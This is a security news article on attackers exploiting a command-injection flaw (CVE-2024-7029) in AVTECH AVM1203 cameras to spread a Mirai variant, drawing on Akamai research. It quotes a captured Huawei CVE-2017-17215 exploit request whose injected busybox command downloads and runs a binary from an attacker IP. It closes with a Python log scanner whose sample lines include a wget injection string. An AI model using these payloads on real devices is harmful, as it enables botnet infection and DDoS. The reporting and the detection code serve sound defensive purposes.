Malicious hackers are exploiting a critical vulnerability in a widely used surveillance camera to spread Mirai, a family of malware that corrals infected IoT devices into large botnets, which are then used to launch attacks that knock websites and other internet-connected devices offline.
The attacks target the AVM1203, a surveillance device made by Taiwanese manufacturer AVTECH, network security provider Akamai said on Wednesday. Unknown attackers have been exploiting the 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day vulnerability.
Back then, a ragtag army shook the Internet
According to Akamai, attackers are exploiting the vulnerability to install a variant of Mirai. Mirai first came to light in September 2016, when a botnet of infected devices took down the cybersecurity news site Krebs on Security. Mirai contained features that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to carry out distributed denial-of-service attacks of record-breaking scale. In the weeks that followed, the Mirai botnet carried out similar attacks on internet service providers and other targets. One such attack on dynamic domain name provider Dyn brought down large swathes of the internet. To complicate attempts to contain Mirai, its developers released the malware's source code publicly. This allowed virtually anyone to create their own botnets capable of DDoS attacks of once-unimaginable scale.
Kyle Lefton, a security researcher with Akamai's Security Intelligence and Response Team, said in an email that the attacker behind the attacks has carried out DDoS attacks against “various organizations” that he declined to name or describe. So far, the team has seen no evidence that the attackers are monitoring video feeds or using the infected cameras for other purposes.
Akamai discovered the activity using a “honeypot” of devices that mimic cameras on the open internet to observe any attacks targeting them. This technique did not allow researchers to measure the size of the botnet. The U.S. Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.
However, the technique has allowed Akamai to intercept the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019, when the exploit code became public. The zero-day is located in the “brightness argument in the 'action=' parameter” and allows command injection, the researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, was only officially acknowledged this month with the publication of CVE-2024-7029.
Wednesday’s post continued:
How does it work?
This vulnerability was originally discovered while examining our honeypot logs. Figure 1 shows the decoded URL for clarity.
Fig. 1: Decoded payload body of the exploit attempts
The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).
What could happen?
In the exploit examples we observed, this is essentially what happened: The exploit of this vulnerability allows an attacker to execute remote code on a target system.
Figure 3 is an example of a threat actor exploiting this flaw to download and execute a JavaScript file to retrieve and load its main malware payload. Similar to many other botnets, this one also spreads a variant of the Mirai malware to its targets.
In this case, the botnet is likely using the Corona Mirai variant, which other vendors have already referred to in 2020 in connection with the COVID-19 virus.
When executed, the malware connects to a large number of hosts via Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).
Static analysis of the strings in the malware samples shows that the path /ctrlt/DeviceUpgrade_1 is used as a target to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
The botnet also targeted several other vulnerabilities, including Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities being exploited multiple times in the wild, and they continue to be successful.
Since this camera model is no longer supported, it is best for all users to replace it. As with all internet-connected devices, IoT devices should never be accessible using the default credentials provided.
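As an added example (not Akamai's code), here is a small Python scanner that flags the two HTTP exploit patterns described above in ordinary web-server or honeypot access logs: a Factory.cgi request whose brightness value carries shell metacharacters (the CVE-2024-7029 command injection), and a POST to the Huawei DeviceUpgrade_1 path used by the CVE-2017-17215 exploit. The log lines and IP addresses are constructed samples, and LOG_RE, classify and scan are names assumed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not real data.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2024:10:15:01 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=Brightness&brightness=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [11/Mar/2024:10:16:44 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=Brightness&brightness=1%3Bwget%20http://198.51.100.7/x.sh HTTP/1.1" 200 512',
    '203.0.113.9 - - [11/Mar/2024:10:17:02 +0000] "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" 404 0',
    '198.51.100.20 - - [11/Mar/2024:10:18:10 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

# Request line of a combined-log-format entry: "METHOD /target HTTP/x.y"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# Shell metacharacters that never belong in a numeric brightness value.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")

def classify(line):
    """Return a tag naming the exploit attempt, or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    if path == "/cgi-bin/supervisor/Factory.cgi":
        # parse_qs percent-decodes each value, so an encoded ';' still shows up.
        qs = parse_qs(parts.query, keep_blank_values=True)
        if "action" in qs:
            for value in qs.get("brightness", []):
                if SHELL_META.search(value):
                    return "CVE-2024-7029 brightness command injection"
    if m.group("method") == "POST" and path == "/ctrlt/DeviceUpgrade_1":
        return "CVE-2017-17215 DeviceUpgrade_1 probe"
    return None

def scan(lines):
    """Return (source_ip, tag) for every line that classify() flags."""
    hits = []
    for line in lines:
        tag = classify(line)
        if tag:
            hits.append((LOG_RE.match(line).group("ip"), tag))
    return hits

if __name__ == "__main__":
    for ip, tag in scan(SAMPLE_LOG):
        print(f"{ip}: {tag}")
```

Only the request line is visible in an access log, so a POST to DeviceUpgrade_1 is flagged on the path alone; the injected body shown above would need a full packet capture or honeypot log to inspect.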